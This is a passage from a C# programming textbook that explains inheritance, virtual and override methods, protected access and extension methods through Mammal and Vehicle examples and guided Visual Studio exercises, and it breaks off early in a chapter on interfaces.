If you ask several experienced programmers the meaning of the term
inheritance, you will typically get different and conflicting answers. Part of
the confusion stems from the fact that the word inheritance itself has several
subtly different meanings. If someone bequeaths something to you in a will,
you are said to inherit it. Similarly, we say that you inherit half of your genes
from your mother and half of your genes from your father. Both of these uses
of the word have very little to do with inheritance in programming.
Inheritance in programming is all about classification—it’s a relationship
between classes. For example, when you were at school, you probably
learned about mammals, and you learned that horses and whales are
examples of mammals. Each has every attribute that a mammal does (it
breathes air, it suckles its young, it is warm-blooded, and so on), but each
also has its own special features (a horse has hooves, but a whale has flippers
and a fluke).
How can you model a horse and a whale in a program? One way is to
create two distinct classes named Horse and Whale. Each class can
implement the behaviors that are unique to that type of mammal, such as Trot
(for a horse) or Swim (for a whale), in its own way. But how do you handle
behaviors that are common to a horse and a whale, such as Breathe or
SuckleYoung? You can add duplicate methods with these names to both
classes, but this situation becomes a maintenance nightmare, especially if you
also decide to start modeling other types of mammals, such as Human and
Aardvark.
In C#, you can use class inheritance to address these issues. A horse, a
whale, a human, and an aardvark are all types of mammals, so you can create
a class named Mammal that provides the common functionality exhibited by
these types. You can then declare that the Horse, Whale, Human, and
Aardvark classes all inherit from Mammal. These classes then automatically
include the functionality of the Mammal class (Breathe, SuckleYoung, and so
on), but you can also augment each class with the functionality unique to a
particular type of mammal—the Trot method for the Horse class and the
Swim method for the Whale class. If you need to modify the way in which a
common method such as Breathe works, you need to change it in only one
place, the Mammal class.
Using inheritance
You declare that a class inherits from another class by using the following
syntax:
class DerivedClass : BaseClass
{
...
}
The derived class inherits from the base class, and the methods in the base
class become part of the derived class. In C#, a class is allowed to derive
from, at most, one base class; a class is not allowed to derive from two or
more classes. However, unless DerivedClass is declared as sealed, you can
use the same syntax to derive other classes that inherit from DerivedClass.
(You will learn about sealed classes in Chapter 13, “Creating interfaces and
defining abstract classes.”)
class DerivedSubClass : DerivedClass
{
...
}
Continuing the example described earlier, you could declare the Mammal
class as follows. The methods Breathe and SuckleYoung are common to all
mammals.
class Mammal
{
public void Breathe()
{
...
}
public void SuckleYoung()
{
...
}
...
}
You could then define classes for each different type of mammal, adding
more methods as necessary, such as in the following example:
class Horse : Mammal
{
...
public void Trot()
{
...
}
}
class Whale : Mammal
{
...
public void Swim()
{
...
}
}
Note If you are a C++ programmer, you should notice that you do not
and cannot explicitly specify whether the inheritance is public, private,
or protected. C# inheritance is always implicitly public. If you’re
familiar with Java, note the use of the colon and that there is no extends
keyword.
If you create a Horse object in your application, you can call the Trot,
Breathe, and SuckleYoung methods:
Horse myHorse = new Horse();
myHorse.Trot();
myHorse.Breathe();
myHorse.SuckleYoung();
Similarly, you can create a Whale object, but this time you can call the
Swim, Breathe, and SuckleYoung methods; Trot is not available because it is
defined only in the Horse class.
Important Inheritance applies only to classes, not to structures. You
cannot define your own inheritance hierarchy with structures, and you
cannot define a structure that derives from a class or another structure.
All structures actually inherit from an abstract class named
System.ValueType. (Chapter 13 explores abstract classes.) This is purely
an implementation detail of the way in which the Microsoft .NET
Framework defines the common behavior for stack-based value types;
you are unlikely to make direct use of ValueType in your own
applications.
The System.Object class revisited
The System.Object class is the root class of all classes. All classes implicitly
derive from System.Object. Consequently, the C# compiler silently rewrites
the Mammal class as the following code (which you can write explicitly if
you really want to):
class Mammal : System.Object
{
...
}
Any methods in the System.Object class are automatically passed down
the chain of inheritance to classes that derive from Mammal, such as Horse
and Whale. In practical terms, this means that all classes that you define
automatically inherit all the features of the System.Object class. This includes
methods such as ToString (discussed in Chapter 2, “Working with variables,
operators, and expressions”), which is used to convert an object to a string,
typically for display purposes.
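As a minimal sketch (assuming a Mammal class with an accessible parameterless constructor), the inherited method is available without any extra code:

Mammal mammal = new Mammal();
Console.WriteLine(mammal.ToString()); // inherited from System.Object; prints the type name by default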
Calling base-class constructors
In addition to the methods that it inherits, a derived class automatically
contains all the fields from the base class. These fields usually require
initialization when an object is created. You typically perform this kind of
initialization in a constructor. Remember that all classes have at least one
constructor. (If you don’t provide one, the compiler generates a default
constructor for you.)
It is good practice for a constructor in a derived class to call the
constructor for its base class as part of the initialization, which enables the
base-class constructor to perform any additional initialization that it requires.
You can specify the base keyword to call a base-class constructor when you
define a constructor for an inheriting class, as shown in this example:
class Mammal // base class
{
public Mammal(string name) // constructor for base class
{
...
}
...
}
class Horse : Mammal // derived class
{
public Horse(string name)
: base(name) // calls Mammal(name)
{
...
}
...
}
If you don’t explicitly call a base-class constructor in a derived-class
constructor, the compiler attempts to silently insert a call to the base class’s
default constructor before executing the code in the derived-class constructor.
Taking the earlier example, the compiler rewrites this:
class Horse : Mammal
{
public Horse(string name)
{
...
}
...
}
as this:
class Horse : Mammal
{
public Horse(string name)
: base()
{
...
}
...
}
This works if Mammal has a public default constructor. However, not all
classes have a public default constructor (for example, remember that the
compiler generates a default constructor only if you don’t write any
nondefault constructors), in which case, forgetting to call the correct base-
class constructor results in a compile-time error.
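Here is a short sketch of that error case, assuming Mammal declares only the nondefault constructor shown earlier:

class Mammal
{
    public Mammal(string name) { } // no default constructor is generated
}

class Horse : Mammal
{
    // public Horse(string name) { } // compile-time error: the implicit call to base() fails
    public Horse(string name)
        : base(name) // OK: explicitly calls Mammal(string)
    { }
}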
Assigning classes
Previous examples in this book show how to declare a variable by using a
class type and how to use the new keyword to create an object. There are also
examples of how the type-checking rules of C# prevent you from assigning
an object of one type to a variable declared as a different type. For example,
given the definitions of the Mammal, Horse, and Whale classes shown here,
the code that follows these definitions is illegal:
class Mammal
{
...
}
class Horse : Mammal
{
...
}
class Whale : Mammal
{
...
}
...
Horse myHorse = new Horse(...);
Whale myWhale = myHorse; // error - different types
However, it is possible to refer to an object from a variable of a different
type as long as the type used is a class that is higher up the inheritance
hierarchy. So the following statements are legal:
Horse myHorse = new Horse(...);
Mammal myMammal = myHorse; // legal, Mammal is the base class of
Horse
If you think about it in logical terms, all Horses are Mammals, so you can
safely assign an object of type Horse to a variable of type Mammal. The
inheritance hierarchy means that you can think of a Horse simply as a special
type of Mammal; it has everything that a Mammal has with a few extra bits
defined by any methods and fields you added to the Horse class. You can
also make a Mammal variable refer to a Whale object. There is one
significant limitation, however: When referring to a Horse or Whale object
by using a Mammal variable, you can access only methods and fields that are
defined by the Mammal class. Any additional methods defined by the Horse
or Whale class are not visible through the Mammal class.
Horse myHorse = new Horse(...);
Mammal myMammal = myHorse;
myMammal.Breathe(); // OK - Breathe is part of the Mammal class
myMammal.Trot(); // error - Trot is not part of the Mammal
class
Note The preceding discussion explains why you can assign almost
anything to an object variable. Remember that object is an alias for
System.Object, and all classes inherit from System.Object, either directly
or indirectly.
Be warned that the converse situation is not true. You cannot unreservedly
assign a Mammal object to a Horse variable:
Mammal myMammal = new Mammal(...);
Horse myHorse = myMammal; // error
This looks like a strange restriction, but remember that not all Mammal
objects are Horses—some might be Whales. You can assign a Mammal
object to a Horse variable as long as you first check that the Mammal is really
a Horse, by using the as or is operator or by using a cast (Chapter 7,
“Creating and managing classes and objects,” discusses the is and as
operators and casts). The code example that follows uses the as operator to
check that myMammal refers to a Horse, and if it does, the assignment to
myHorseAgain results in myHorseAgain referring to the same Horse object.
If myMammal refers to some other type of Mammal, the as operator returns
null instead.
Horse myHorse = new Horse(...);
Mammal myMammal = myHorse;               // myMammal refers to a Horse
...
Horse myHorseAgain = myMammal as Horse; // OK - myMammal was a Horse
...
Whale myWhale = new Whale(...);
myMammal = myWhale;
...
myHorseAgain = myMammal as Horse;        // returns null - myMammal was a Whale
Declaring new methods
One of the hardest tasks in the realm of computer programming is thinking up
unique and meaningful names for identifiers. If you are defining a method for
a class and that class is part of an inheritance hierarchy, sooner or later you
are going to try to reuse a name that is already in use by one of the classes
further up the hierarchy. If a base class and a derived class happen to declare
two methods that have the same signature, you will receive a warning when
you compile the application.
Note The method signature refers to the name of the method and the
number and types of its parameters, but not its return type. Two
methods that have the same name and that take the same list of
parameters have the same signature, even if they return different types.
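For example, declaring both of the following methods in one class causes a compile-time error, because they have the same signature even though their return types differ (the Describe method is illustrative):
class Mammal
{
    public int Describe(string name) { return 0; }

    // Compile-time error if uncommented: same signature as the method
    // above, because the return type is not part of the signature.
    // public string Describe(string name) { return ""; }
}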
A method in a derived class masks (or hides) a method in a base class that
has the same signature. For example, if you compile the following code, the
compiler generates a warning message informing you that Horse.Talk hides
the inherited method Mammal.Talk:
class Mammal
{
...
public void Talk() // assume that all mammals can talk
{
...
}
}
class Horse : Mammal
{
...
public void Talk() // horses talk in a different way from other mammals!
{
...
}
}
Although your code will compile and run, you should take this warning
seriously. If another class derives from Horse and calls the Talk method, it
might be expecting the method implemented in the Mammal class to be
called. However, the Talk method in the Horse class hides the Talk method in
the Mammal class, and the Horse.Talk method will be called instead. Most of
the time, such a coincidence is at best a source of confusion, and you should
consider renaming methods to avoid clashes. However, if you’re sure that
you want the two methods to have the same signature, thus hiding the
Mammal.Talk method, you can silence the warning by using the new
keyword, as follows:
class Mammal
{
...
public void Talk()
{
...
}
}
class Horse : Mammal
{
...
new public void Talk()
{
...
}
}
Using the new keyword like this does not change the fact that the two
methods are completely unrelated and that hiding still occurs. It just turns the
warning off. In effect, the new keyword says, “I know what I’m doing, so
stop showing me these warnings.”
Declaring virtual methods
Sometimes, you do want to hide the way in which a method is implemented
in a base class. As an example, consider the ToString method in
System.Object. The purpose of ToString is to convert an object to its string
representation. Because this method is very useful, it is a member of the
System.Object class, thereby automatically providing all classes with a
ToString method. However, how does the version of ToString implemented
by System.Object know how to convert an instance of a derived class to a
string? A derived class might contain any number of fields with interesting
values that should be part of the string. The answer is that the implementation
of ToString in System.Object is actually a bit simplistic. All it can do is
convert an object to a string that contains the name of its type, such as
“Mammal” or “Horse.” This is not very useful after all. So why provide a
method that is so useless? The answer to this second question requires a bit of
detailed thought.
Obviously, ToString is a fine idea in concept, and all classes should
provide a method that can be used to convert objects to strings for display or
debugging purposes. It is only the implementation that requires attention. In
fact, you are not expected to call the ToString method defined by
System.Object; it is simply a placeholder. Instead, you might find it more
useful to provide your own version of the ToString method in each class you
define, overriding the default implementation in System.Object. The version
in System.Object is there only as a safety net, in case a class does not
implement or require its own specific version of the ToString method.
A method that is intended to be overridden is called a virtual method. You
should be clear on the difference between overriding a method and hiding a
method. Overriding a method is a mechanism for providing different
implementations of the same method—the methods are all related because
they are intended to perform the same task, but in a class-specific manner.
Hiding a method is a means of replacing one method with another—the
methods are usually unrelated and might perform totally different tasks.
Overriding a method is a useful programming concept; hiding a method is
often an error.
You can mark a method as a virtual method by using the virtual keyword.
For example, the ToString method in the System.Object class is defined like
this:
namespace System
{
class Object
{
public virtual string ToString()
{
...
}
...
}
...
}
Note If you have experience developing in Java, you should note that
C# methods are not virtual by default.
Declaring override methods
If a base class declares that a method is virtual, a derived class can use the
override keyword to declare another implementation of that method, as
demonstrated here:
class Horse : Mammal
{
...
public override string ToString()
{
...
}
}
The new implementation of the method in the derived class can call the
original implementation of the method in the base class by using the base
keyword, like this:
public override string ToString()
{
string temp = base.ToString();
...
}
There are some important rules you must follow when you declare
polymorphic methods (as discussed in the sidebar “Virtual methods and
polymorphism”) by using the virtual and override keywords; a short sketch
illustrating two of them follows this list:
A virtual method cannot be private; it is intended to be exposed to
other classes through inheritance. Similarly, override methods cannot
be private because a class cannot change the protection level of a
method that it inherits. However, override methods can have a special
form of privacy known as protected access, as you will find out in the
next section.
The signatures of the virtual and override methods must be identical;
they must have the same name, number, and types of parameters. Also,
both methods must return the same type.
You can only override a virtual method. If the base class method is not
virtual and you try to override it, you’ll get a compile-time error. This
is sensible; it should be up to the designer of the base class to decide
whether its methods can be overridden.
If the derived class does not declare the method by using the override
keyword, it does not override the base class method; it hides the
method. In other words, it becomes an implementation of a completely
different method that happens to have the same name. As before, this
will cause a compile-time warning, which you can silence by using the
new keyword, as previously described.
An override method is implicitly virtual and can itself be overridden in
a further derived class. However, you are not allowed to explicitly
declare that an override method is virtual by using the virtual keyword.
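As promised, here is a minimal sketch of two of these rules: you can only override a virtual method, and an override method is implicitly virtual. (The Eat method and the RaceHorse class are illustrative additions to the Mammal hierarchy.)
class Mammal
{
    public void Eat() { }              // not virtual
    public virtual void Breathe() { }  // virtual, so it can be overridden
}
class Horse : Mammal
{
    // Compile-time error if uncommented: Eat is not virtual.
    // public override void Eat() { }

    public override void Breathe() { } // OK: overrides a virtual method
}
class RaceHorse : Horse
{
    // OK: an override method is implicitly virtual, so it can be
    // overridden again in a further derived class.
    public override void Breathe() { }
}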
Virtual methods and polymorphism
Using virtual methods, you can call different versions of the same
method, based on the object type determined dynamically at runtime.
Consider the following examples of classes that define a variation on
the Mammal hierarchy described earlier:
class Mammal
{
...
public virtual string GetTypeName()
{
return "This is a mammal";
}
}
class Horse : Mammal
{
...
public override string GetTypeName()
{
return "This is a horse";
}
}
class Whale : Mammal
{
...
public override string GetTypeName()
{
return "This is a whale";
}
}
class Aardvark : Mammal
{
...
}
There are two things that you should note: first, the override
keyword used by the GetTypeName method in the Horse and Whale
classes, and second, the fact that the Aardvark class does not have a
GetTypeName method.
Now examine the following block of code:
Mammal myMammal;
Horse myHorse = new Horse(...);
Whale myWhale = new Whale(...);
Aardvark myAardvark = new Aardvark(...);
myMammal = myHorse;
Console.WriteLine(myMammal.GetTypeName()); // Horse
myMammal = myWhale;
Console.WriteLine(myMammal.GetTypeName()); // Whale
myMammal = myAardvark;
Console.WriteLine(myMammal.GetTypeName()); // Aardvark
What will the three different Console.WriteLine statements output?
At first glance, you would expect them all to print “This is a mammal”
because each statement calls the GetTypeName method on the
myMammal variable, which is a Mammal. However, in the first case,
you can see that myMammal is actually a reference to a Horse.
(Remember, you are allowed to assign a Horse to a Mammal variable
because the Horse class inherits from the Mammal class.) Because the
GetTypeName method is defined as virtual, the runtime works out that it
should call the Horse.GetTypeName method, so the statement actually
prints the message “This is a horse.” The same logic applies to the
second Console.WriteLine statement, which outputs the message “This
is a whale.” The third statement calls Console.WriteLine on an
Aardvark object. However, the Aardvark class does not have a
GetTypeName method, so the default method in the Mammal class is
called, returning the string “This is a mammal.”
This phenomenon of the same statement invoking a different method
depending on its context is called polymorphism, which literally means
“many forms.”
Understanding protected access
The public and private access keywords create two extremes of accessibility:
public fields and methods of a class are accessible to everyone, whereas
private fields and methods of a class are accessible only to the class itself.
These two extremes are sufficient when you consider classes in isolation.
However, as all experienced object-oriented programmers know, isolated
classes cannot solve complex problems. Inheritance is a powerful way of
connecting classes, and there is clearly a special and close relationship
between a derived class and its base class. Frequently, it is useful for a base
class to allow derived classes to access some of its members while also
hiding these members from classes that are not part of the inheritance
hierarchy. In this situation, you can mark members with the protected
keyword. It works like this (a short sketch follows these two rules):
If a class A is derived from another class B, it can access the protected
class members of class B. In other words, inside the derived class A, a
protected member of class B is effectively public.
If a class A is not derived from another class B, it cannot access any
protected members of class B. So, within class A, a protected member
of class B is effectively private.
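Here is a sketch of these two rules (the name field, Describe method, and Stable class are illustrative):
class Mammal
{
    protected string name; // visible to Mammal and to classes derived from it

    public Mammal(string name)
    {
        this.name = name;
    }
}
class Horse : Mammal
{
    public Horse(string name) : base(name) { }

    public string Describe()
    {
        return "A horse called " + this.name; // legal: Horse derives from Mammal
    }
}
class Stable // not derived from Mammal
{
    public void Examine(Horse horse)
    {
        // Compile-time error if uncommented: from the perspective of
        // Stable, the name member is effectively private.
        // string n = horse.name;
    }
}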
C# gives programmers the complete freedom to declare methods and
fields as protected. However, most object-oriented programming guidelines
recommend that you keep your fields strictly private whenever possible and
only relax these restrictions when necessary. Public fields violate
encapsulation because all users of the class have direct, unrestricted access to
the fields. Protected fields maintain encapsulation for users of a class, for
whom the protected fields are inaccessible. However, protected fields still
allow encapsulation to be violated by other classes that inherit from the base
class.
Note You can access a protected base class member not only in a
derived class but also in classes derived from the derived class.
In the following exercise, you will define a simple class hierarchy for
modeling different types of vehicles. You will define a base class named
Vehicle and derived classes named Airplane and Car. You will define
common methods named StartEngine and StopEngine in the Vehicle class,
and you will add some methods to both of the derived classes that are specific
to those classes. Finally, you will add a virtual method named Drive to the
Vehicle class and override the default implementation of this method in both
of the derived classes.
Create a hierarchy of classes
1. Start Microsoft Visual Studio 2017 if it is not already running.
2. Open the Vehicles solution, which is located in the \Microsoft
Press\VCSBS\Chapter 12\Vehicles folder in your Documents folder.
The Vehicles project contains the file Program.cs, which defines the
Program class with the Main and doWork methods that you have seen in
previous exercises.
3. In Solution Explorer, right-click the Vehicles project, point to Add, and
then click Class.
The Add New Item – Vehicles dialog box opens.
4. In the Add New Item – Vehicles dialog box, verify that the Class
template is highlighted. In the Name box, type Vehicle.cs, and then click
Add.
The file Vehicle.cs is created and added to the project and appears in the
Code and Text Editor window. The file contains the definition of an
empty class named Vehicle.
5. Add the StartEngine and StopEngine methods to the Vehicle class, as
shown next in bold:
class Vehicle
{
public void StartEngine(string noiseToMakeWhenStarting)
{
Console.WriteLine($"Starting engine: {noiseToMakeWhenStarting}");
}
public void StopEngine(string noiseToMakeWhenStopping)
{
Console.WriteLine($"Stopping engine: {noiseToMakeWhenStopping}");
}
}
All classes that derive from the Vehicle class will inherit these methods.
The values for the noiseToMakeWhenStarting and
noiseToMakeWhenStopping parameters will be different for each type of
vehicle and will help you to identify which vehicle is being started and
stopped later.
6. On the Project menu, click Add Class.
The Add New Item—Vehicles dialog box opens again.
7. In the Name box, type Airplane.cs, and then click Add.
A new file containing a class named Airplane is added to the project and
appears in the Code and Text Editor window.
8. In the Code and Text Editor window, modify the definition of the
Airplane class so that it inherits from the Vehicle class, as shown in bold
here:
class Airplane : Vehicle
{
}
9. Add the TakeOff and Land methods to the Airplane class, as shown in
bold in the following:
class Airplane : Vehicle
{
public void TakeOff()
{
Console.WriteLine("Taking off");
}
public void Land()
{
Console.WriteLine("Landing");
}
}
10. On the Project menu, click Add Class.
The Add New Item – Vehicles dialog box opens again.
11. In the Name text box, type Car.cs, and then click Add.
A new file containing a class named Car is added to the project and
appears in the Code and Text Editor window.
12. In the Code and Text Editor window, modify the definition of the Car
class so that it derives from the Vehicle class, as shown here in bold:
class Car : Vehicle
{
}
13. Add the Accelerate and Brake methods to the Car class, as shown in
bold in the following:
class Car : Vehicle
{
public void Accelerate()
{
Console.WriteLine("Accelerating");
}
public void Brake()
{
Console.WriteLine("Braking");
}
}
14. Display the Vehicle.cs file in the Code and Text Editor window.
15. Add the virtual Drive method to the Vehicle class, as presented here in
bold:
class Vehicle
{
...
public virtual void Drive()
{
Console.WriteLine("Default implementation of the Drive method");
}
}
16. Display the Program.cs file in the Code and Text Editor window.
17. In the doWork method, delete the // TODO: comment and add the code
shown in bold to create an instance of the Airplane class and test its
methods by simulating a quick journey by airplane, as follows:
static void doWork()
{
Console.WriteLine("Journey by airplane:");
Airplane myPlane = new Airplane();
myPlane.StartEngine("Contact");
myPlane.TakeOff();
myPlane.Drive();
myPlane.Land();
myPlane.StopEngine("Whirr");
}
18. Add the statements that follow (shown in bold) to the doWork method
after the code you just wrote. These statements create an instance of the
Car class and test its methods.
static void doWork()
{
...
Console.WriteLine();
Console.WriteLine("Journey by car:");
Car myCar = new Car();
myCar.StartEngine("Brm brm");
myCar.Accelerate();
myCar.Drive();
myCar.Brake();
myCar.StopEngine("Phut phut");
}
19. On the Debug menu, click Start Without Debugging.
In the console window, verify that the program outputs messages
simulating the different stages of performing a journey by airplane and
by car, as shown in the following image:
Notice that both modes of transport invoke the default implementation
of the virtual Drive method because neither class currently overrides this
method.
20. Press Enter to close the application and return to Visual Studio 2017.
21. Display the Airplane class in the Code and Text Editor window.
Override the Drive method in the Airplane class, as follows in bold:
class Airplane : Vehicle
{
...
public override void Drive()
{
Console.WriteLine("Flying");
}
}
Note IntelliSense displays a list of available virtual methods. If
you select the Drive method from the IntelliSense list, Visual
Studio automatically inserts into your code a statement that calls
the base.Drive method. If this happens, delete the statement,
because this exercise does not require it.
22. Display the Car class in the Code and Text Editor window. Override the
Drive method in the Car class, as shown in bold in the following:
class Car : Vehicle
{
...
public override void Drive()
{
Console.WriteLine("Motoring");
}
}
23. On the Debug menu, click Start Without Debugging.
In the console window, notice that the Airplane object now displays the
message Flying when the application calls the Drive method, and the
Car object displays the message Motoring:
24. Press Enter to close the application and return to Visual Studio 2017.
25. Display the Program.cs file in the Code and Text Editor window.
26. Add the statements shown here in bold to the end of the doWork
method:
static void doWork()
{
...
Console.WriteLine("\nTesting polymorphism");
Vehicle v = myCar;
v.Drive();
v = myPlane;
v.Drive();
}
This code tests the polymorphism provided by the virtual Drive method.
The code creates a reference to the Car object by using a Vehicle
variable (which is safe because all Car objects are Vehicle objects) and
then calls the Drive method by using this Vehicle variable. The final two
statements refer the Vehicle variable to the Airplane object and call what
seems to be the same Drive method again.
27. On the Debug menu, click Start Without Debugging.
In the console window, verify that the same messages appear as before,
followed by this text:
Testing polymorphism
Motoring
Flying
The Drive method is virtual, so the runtime (not the compiler) works out
which version of the Drive method to call when invoking it through a
Vehicle variable, based on the real type of the object referenced by this
variable. In the first case, the Vehicle object refers to a Car, so the
application calls the Car.Drive method. In the second case, the Vehicle
object refers to an Airplane, so the application calls the Airplane.Drive
method.
28. Press Enter to close the application and return to Visual Studio 2017.
Creating extension methods
Inheritance is a powerful feature that makes it possible for you to extend the
functionality of a class by creating a new class that derives from it. However,
sometimes using inheritance is not the most appropriate mechanism for
adding new behaviors, especially if you need to quickly extend a type without
affecting existing code.
For example, suppose you want to add a new feature to the int type, such
as a method named Negate that returns the negative equivalent value that an
integer currently contains. (I know that you could simply use the unary minus
operator [–] to perform the same task, but bear with me.) One way to achieve
this is to define a new type named NegInt32 that inherits from System.Int32
(int is an alias for System.Int32) and adds the Negate method:
class NegInt32 : System.Int32 // this will not compile - see below
{
public int Negate()
{
...
}
}
The theory is that NegInt32 will inherit all the functionality associated
with the System.Int32 type in addition to the Negate method. There are two
reasons why you might not want to follow this approach:
This method applies only to the NegInt32 type, and if you want to use
it with existing int variables in your code, you have to change the
definition of every int variable to the NegInt32 type.
The System.Int32 type is actually a structure, not a class, and you
cannot use inheritance with structures.
This is where extension methods become very useful.
Using an extension method, you can extend an existing type (a class or
structure) with additional static methods. These static methods become
immediately available to your code in any statements that reference data of
the type being extended.
You define an extension method in a static class and specify the type to
which the method applies as the first parameter to the method, along with the
this keyword. Here’s an example showing how you can implement the
Negate extension method for the int type:
static class Util
{
public static int Negate(this int i)
{
return -i;
}
}
The syntax looks a little odd, but it is the this keyword prefixing the
parameter to Negate that identifies it as an extension method, and the fact that
the parameter that this prefixes is an int means that you are extending the int
type.
To use the extension method, bring the Util class into scope. (If necessary,
add a using statement that specifies the namespace to which the Util class
belongs, or a using static statement that specifies the Util class directly.) Then
you can simply use dot notation (.) to reference the method, like this:
int x = 591;
Console.WriteLine($"x.Negate {x.Negate()}");
Notice that you do not need to reference the Util class anywhere in the
statement that calls the Negate method. The C# compiler automatically
detects all extension methods for a given type from all the static classes that
are in scope. You can also invoke the Util.Negate method by passing an int as
the parameter, using the regular syntax you have seen before, although this
use obviates the purpose of defining the method as an extension method:
int x = 591;
Console.WriteLine($"x.Negate {Util.Negate(x)}");
In the following exercise, you will add an extension method to the int
type. With this extension method, you can convert the value in an int variable
from base 10 to a representation of that value in a different number base.
Create an extension method
1. In Visual Studio 2017, open the ExtensionMethod solution, which is
located in the \Microsoft Press\VCSBS\Chapter 12\ExtensionMethod
folder in your Documents folder.
2. Display the Util.cs file in the Code and Text Editor window.
This file contains a static class named Util in a namespace named
Extensions. Remember that you must define extension methods inside a
static class. The class is empty apart from the // TODO: comment.
3. Delete the comment and declare a public static method in the Util class,
named ConvertToBase. The method should take two parameters: an int
parameter named i, prefixed with the this keyword to indicate that the
method is an extension method for the int type, and another ordinary int
parameter named baseToConvertTo.
The method will convert the value in i to the base indicated by
baseToConvertTo. The method should return an int containing the
converted value.
The ConvertToBase method should look like this:
static class Util
{
public static int ConvertToBase(this int i, int baseToConvertTo)
{
}
}
4. Add an if statement to the ConvertToBase method that checks that the
value of the baseToConvertTo parameter is between 2 and 10.
The algorithm used by this exercise does not work reliably outside this
range of values. Throw an ArgumentException exception with a suitable
message if the value of baseToConvertTo is outside this range.
The ConvertToBase method should look like this:
public static int ConvertToBase(this int i, int baseToConvertTo)
{
if (baseToConvertTo < 2 || baseToConvertTo > 10)
{
throw new ArgumentException("Value cannot be converted to base " +
    baseToConvertTo.ToString());
}
}
5. Add the following statements shown in bold to the ConvertToBase
method, after the statement block that throws the ArgumentException
exception.
This code implements a well-known algorithm that converts a number
from base 10 to a different number base. (Chapter 5, “Using compound
assignment and iteration statements,” presents a version of this
algorithm for converting a decimal number to octal.)
public static int ConvertToBase(this int i, int baseToConvertTo)
{
...
int result = 0;
int iterations = 0;
do
{
int nextDigit = i % baseToConvertTo;
i /= baseToConvertTo;
result += nextDigit * (int)Math.Pow(10, iterations);
iterations++;
}
while (i != 0);
return result;
}
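For example, calling ConvertToBase(8) on the value 591 proceeds as follows: 591 % 8 is 7 (leaving 73), 73 % 8 is 1 (leaving 9), 9 % 8 is 1 (leaving 1), and 1 % 8 is 1 (leaving 0). The digits 7, 1, 1, and 1 are accumulated at successive powers of 10, so the method returns 1117, which is the octal representation of 591.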
6. Display the Program.cs file in the Code and Text Editor window.
7. Add the following using directive after the using System; directive at the
top of the file:
using Extensions;
This statement brings the namespace containing the Util class into
scope. The compiler might display the warning, “Using directive is
unnecessary.” However, the ConvertToBase extension method will not
be visible in the Program.cs file if you do not perform this task.
8. Add the following statements shown in bold to the doWork method of
the Program class, replacing the // TODO: comment:
static void doWork()
{
int x = 591;
for (int i = 2; i <= 10; i++)
{
Console.WriteLine($"{x} in base {i} is {x.ConvertToBase(i)}");
}
}
This code creates an int named x and sets it to the value 591. (You can
pick any integer value you want.) The code then uses a loop to print out
the value 591 in all number bases between 2 and 10. Notice that
ConvertToBase appears as an extension method in IntelliSense when
you type the period (.) after x in the Console.WriteLine statement.
9. On the Debug menu, click Start Without Debugging. Confirm that the
program displays messages to the console showing the value 591 in the
different number bases, like this:
10. Press Enter to close the program and return to Visual Studio 2017.
Summary
In this chapter, you learned how to use inheritance to define a hierarchy of
classes, and you should now understand how to override inherited methods
and implement virtual methods. You also learned how to add an extension
method to an existing type.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 13.
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference
To create a derived class from a base class, declare the new class name followed by a colon and the name of the base class. For example:
class DerivedClass : BaseClass
{
...
}
To call a base-class constructor as part of the constructor for an inheriting class, suffix the definition of the constructor with a call to base, before the body of the derived-class constructor, and provide any necessary parameters to the base constructor. For example:
class DerivedClass : BaseClass
{
...
public DerivedClass(int x) : base(x)
{
...
}
...
}
To declare a virtual method, use the virtual keyword when declaring the method. For example:
class Mammal
{
public virtual void Breathe()
{
...
}
...
}
To implement a method in a derived class that overrides an inherited virtual method, use the override keyword when declaring the method in the derived class. For example:
class Whale : Mammal
{
public override void Breathe()
{
...
}
...
}
To define an extension method for a type, add a static public method to a static class. The first parameter must be of the type being extended, preceded by the this keyword. For example:
static class Util
{
public static int Negate(this int i)
{
return -i;
}
}
CHAPTER 13
Creating interfaces and defining
abstract classes
After completing this chapter, you will be able to:
Define an interface specifying the signatures and return types of
methods.
Implement an interface in a structure or class.
Reference a class through an interface.
Capture common implementation details in an abstract class.
Implement sealed classes that cannot be used to derive new classes.
Inheriting from a class is a powerful mechanism, but the real power of
inheritance comes from inheriting from an interface. An interface does not
contain any code or data; it just specifies the methods and properties that a
class that inherits from the interface must provide. By using an interface, you
can completely separate the names and signatures of the methods of a class
from the method’s implementation.
Abstract classes are similar to interfaces in many ways, except that
abstract classes can contain code and data. However, you can specify certain
methods of an abstract class as virtual so that a class that inherits from the
abstract class can optionally provide its own implementation of these
methods. You frequently use abstract classes with interfaces, and together
they provide a key technique with which you can build extensible
programming frameworks, as you will discover in this chapter.
Understanding interfaces
Suppose that you want to define a new class in which you can store
collections of objects, a bit like you would use an array. However, unlike
with an array, you want to provide a method named RetrieveInOrder to
enable applications to retrieve objects in a sequence that depends on the type
of object the collection contains. (With an ordinary array, you can iterate
through its contents, and by default, you retrieve items according to their
index.) For example, if the collection holds alphanumeric objects such as
strings, the collection should enable an application to retrieve these strings in
sequence according to the collating sequence of the computer, and if the
collection holds numeric objects such as integers, the collection should
enable the application to retrieve objects in numerical order.
When you define the collection class, you do not want to restrict the types
of objects that it can hold (the objects can even be class or structure types),
and consequently, you don’t know how to order these objects. So, how do
you provide the collection class with a method that sorts objects whose types
you do not know when you actually write the collection class? At first glance,
this problem seems similar to the ToString problem described in Chapter 12,
“Working with inheritance,” which could be resolved by declaring a virtual
method that subclasses of your collection class can override. However, any
similarity is misleading. There is no inheritance relationship between the
collection class and the objects that it holds, so a virtual method would not be
of much use. If you think for a moment, the problem is that the way in which
the objects in the collection should be ordered is dependent on the type of the
object in the collection and not on the collection itself. The solution is to
require that all the objects provide a method, such as the CompareTo method
shown in the following example, that the RetrieveInOrder method of the
collection can call, making it possible for the collection to compare these
objects with one another:
int CompareTo(object obj)
{
// return 0 if this instance is equal to obj
// return < 0 if this instance is less than obj
// return > 0 if this instance is greater than obj
...
}
You can define an interface for collectible objects that includes the
CompareTo method and specify that the collection class can contain only
classes that implement this interface. In this way, an interface is similar to a
contract. If a class implements an interface, the interface guarantees that the
class contains all the methods specified in the interface. This mechanism
ensures that you will be able to call the CompareTo method on all objects in
the collection and sort them.
Using interfaces, you can truly separate the “what” from the “how.” An
interface gives you only the name, return type, and parameters of the method.
Exactly how the method is implemented is not a concern of the interface. The
interface describes the functionality that a class should provide but not how
this functionality is implemented.
Defining an interface
Defining an interface is syntactically similar to defining a class, except that
you use the interface keyword instead of the class keyword. Within the
interface, you declare methods exactly as in a class or structure, except that
